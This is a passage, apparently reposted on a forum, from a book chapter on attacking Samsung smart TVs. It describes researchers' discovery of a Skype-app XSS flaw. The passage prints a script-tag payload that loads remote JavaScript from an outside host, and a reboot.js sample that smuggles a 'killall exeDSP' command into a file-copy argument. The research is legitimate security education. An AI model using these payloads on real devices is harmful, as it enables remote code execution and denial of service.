Abusing the Internet of Things

(Rick Simeone) #1
PluginAPIMgr.GetMyStorageInfo = function()
{
alert("PluginAPIMgr.GetMyStorageInfo");
var result = this.ExWidgetInterfacePlugin.Execute("ReadWidgetData
", "SkypeInfo"; return result;
}

In JavaScript, the alert function is used to pop up a dialog box and display the string
passed in as a parameter. However, in this case, the Samsung TV was actually logging the
given string to a local file. The researchers realized that this meant that Samsung had modi-
fied the actual JavaScript interpreter and that the JavaScript platform was able to perform local
file and system operations. This is interesting because JavaScript code running in a typical
web browser is usually not allowed to perform system-level operations like these (without
some explicit tweaking). This means that a simple flaw in the app could result in a remotely
exploitable condition.
The popular XSS (Cross Site Scripting) attack vector usually depends upon the inability of
a web application to validate HTML characters (<, >, /, etc.), which in turn allows attackers to
inject malicious JavaScript code. Quite similar to an XSS attack, the researchers found a lack
of validation in the mood message. Mood messages in Skype are basically status messages
such as “Just had coffee, a little jittery today!” or “Out and about, may not respond immedi-
ately so be patient!” Now imagine a mood message like the following:


<script src="http://tv.isecpartners.com/reboot.js"></script>

Suppose someone sent you a message on Skype with this as his mood message. You’d
expect the app to actually display the mood message as . But instead, the Skype app actually processes the string as code and
executes it. This causes the Skype app to fetch reboot.js and process the code in it! Now imag-
ine if the following were the content of reboot.js:


fileobject = document.createElement('object');
fileobject.setAttribute("id", "pluginObjectFile");
fileobject.setAttribute("classid", "clsid:SAMSUNG-INFOLINK-FILESYSTEM");
document.getElementsByTagName("body"[0].appendChild(fileobject);
filePlugin = document.getElementById('pluginObjectFile');
// Kill exeDSP, forcing reboot
filePlugin.Copy("/proc/self/cmdline", "\$(killall exeDSP)/tmp/foo");

Notice the parameters to filePlugin.Copy. Grattafiori and Yavor noted that they could
inject the killall exeDSP command as a parameter, causing the TV to reboot since the


144 CHAPTER 5: THE IDIOT BOX—ATTACKING “SMART” TELEVISIONS
Free download pdf